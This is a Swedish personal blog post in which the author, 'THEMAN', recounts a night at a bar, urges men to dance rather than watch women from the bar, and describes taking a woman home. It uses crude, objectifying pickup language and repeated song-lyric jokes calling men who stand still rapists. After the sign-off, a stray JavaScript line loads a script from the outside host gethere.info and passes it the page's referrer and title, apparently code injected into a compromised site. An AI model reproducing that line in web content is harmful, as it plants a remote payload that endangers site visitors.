Ni vet grabbar ibland gå man ut och kvällen blir inte som man tänkt sig. Så var det ofta för mej förut när jag gick ut. Jag kom in på ett hak hängde av mej med en polare, polaren gick till baren, jag gick på toa och sen möttes vi upp vid baren. Bredvid baren är alltid dansgolvet och där står man kollar in alla fina brudar och försöker på nåt sätt skapa ögonkontakt.

Ärligt talat, jag visste fan inte vad jag skulle göra efter att hon tittar på mej och ler, ”vad fan gör jag nu?”. Och då kom den, the creepy look, jag ståendes vid baren med ordet FLÖJT skrivet över hela pannan. Så är det när man har noll game. Jag fick till det då och då men det var typ för att tjejen kom fram började prata. När jag tittar tillbaka så var det snarare hennes initiativ som gjorde det. Men det är var kanske en kväll av hundra… Ofta stod jag där och tre öl och ett par shot senare var jag man nog för att gå fram till en tjej och fråga om jag fick köpa en drink till henne… Jag vet, FUCKING PATETISKT!!! Och efter att ha stått stilla så länge och bara glott på folk har man en riktigt creepy vibb… Så det är nästan garanterat att man fuckar up det … Men sån va jag.

Jag brukade typ säga skit som ”nej vi gå inte till det och det haket, de har ett skit stort dansgolv och det är rök, musik, massa jävla ljus… vi går nånstans där det är lugnare…”

Så frågan är: hur fan gör man på dansgolvet? Hur gör man i trånga utrymmen eller på kvällar där allt verkar vara emot en?

Kan ta ett exempel från denna onsdag. Jag kom ut ganska sent och drog till nåt skithak med ett par killar. Sen ett skithak till… Inget dans golv, ingen musik och typ 3 tjejer som satt i nåt hörn med två killar på sig var… Alla dessa killar är mina nära vänner, men de har noll game och alla satt där med sin öl och det var ”grabbkväll” som en av mina nära vänner som jag älskar utryckte så fint… Det betyder ungefär att vi går ut och super skallen av oss och behöver inte känna pressen av att kvinnor finns i den här världen, eller snarare inte tänka på att vi inte vet vad fan vi ska göra och har typ noll game…Varje gång jag pratade om tjejer så vart det: Nej nej, fan, lägg ner, det är ju grabbkväll!!!

Slutligen lyckades jag tjata med dem till East. När vi kommer in har halva truppen droppat av… Jag kommer in och så upperepas det klassiska mönstret – mina polare står vid baren och flöjtar… Men jag orkade inte med det, fuck this!

BANG!! ITS ON!!! THEMAN rör sej till dansgolvet… som inte finns!

Det var typ 6 kvadratmeter vid den lilla baren på East.. Energi sprutar ut ur mina ögon när jag står där… Jag svänger med armarna gör all kinds off crazy shit but i love it… Och jag ser min polare som kollar på och smågarvar lite… Jag blir helt galen och kommer igång på riktigt och där kommer låten. Basen pumpar och den sköna Electrorytmen sprutar ut ur högtalarna ”alla som inte dansar är våldtäktsmän!” mina fötter rör sig i takt, jag har glow på hela min kropp och är fullständigt elektrisk… Till höger om mig kommer två tjejer och ställer sig bredvid och börjar dansa, knuffar till den ena med min höft, sen vänder jag min rygg mot henne samtidigt som jag dansar och vi gör en cheek to cheek fast med röven. Jag vänder mej om hon gör en piruett. Sen drar jag in hennes polare så hon inte ska känna sig utanför.

Jag ser minen på mina kompisar ansikte.. YEEAAHH!!!

Då kommer det sköna stycket… i texten…

”Första steget är att ni håller hand han verkar trevlig, verkar omtänksam,
men det blir jobbigt när det kommer fram att han står stilla som en våldtäktsman”

Det är det låten handlar. Sluta hänga vid baren! VAR FESTEN! Jag går inte till festen, jag ÄR festen!!! Antingen kan du stå vid baren dricka öl efter öl eller så kan du vara festen, prata med alla, skåla med alla och dansa som en fucking kung… Och by the way, jag kan inte dansa för fem öre. Jag bara älskar när jag gör det, och det är det som är kungligt på dansgolvet!

Jag dansar vidare med tjejen och sen går vi ut och röker. Ute på rökrutan pratar vi om viktiga saker som hur gott det är med julmust och att jag råkar ha julmust hemma. BANG!!!

En timme senare ligger jag där i sängen med henne bredvid mig och kommer ihåg ansiktet på mina kompisar när jag sa ”vi ska dra hem nu!”. och vad tänker jag på – jo, på den fantastiska låten… jag blir galen och kan inte stå still när jag hör den!

Valet är ditt. Ska du stå vid baren ikväll och kolla på tjejer? Ta en till och en till öl och se ut som en våldtäktsman. Eller ska du vara en man, vara festen och dra in tjejer med din positiva energi? Ska du på fest ikväll eller är du festen???

Love, THEMAN

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;